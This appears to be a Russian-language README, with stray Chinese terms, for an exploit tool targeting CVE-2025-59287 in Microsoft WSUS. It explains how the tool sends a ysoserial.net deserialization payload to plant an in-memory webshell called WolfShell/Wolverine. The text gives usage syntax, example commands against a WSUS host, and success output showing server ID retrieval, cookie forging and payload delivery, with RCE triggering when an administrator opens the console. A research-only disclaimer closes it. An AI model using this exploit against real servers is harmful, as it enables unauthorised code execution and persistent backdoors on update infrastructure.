
Эксплойт для CVE-2025-59287, внедряющий память-вебшелл WolfShell в серверы WSUS для достижения удалённого выполнения кода при открытии консоли администратора.
CVE-2025-59287 — внедрение WolfShell (положительная内存马 Wolverine)
CVE-2025-59287 использует логическую ошибку в компонентах WSUS для внедрения内存马 WolfShell на целевой сервер. Когда администратор открывает консоль WSUS (по умолчанию срабатывает в случайный момент в течение 1–30 минут),内存马 активируется и приводит к удалённому выполнению кода (RCE). Этот документ содержит примеры эксплуатации, необходимые файлы и рекомендации по защите.
Отправка десериализационного payload ysoserial.net на целевой сервер с настраиваемой функциональностью; в данном проекте демонстрируется внедрение内存马 Wolverine
Usage: CVE-2025-59287 <target_url> <payload_file>
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters
[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt

Defender в win2019 блокирует и уничтожает, использовать невозможно

Как показано на рисунке, успешное прослушивание порта 7556 означает, что положительная内存马 Wolverine внедрена


Данный документ предназначен исключительно для целей исследования безопасности и защиты. Не используйте соответствующий эксплойт-код против несанкционированных систем или в атакующих действиях.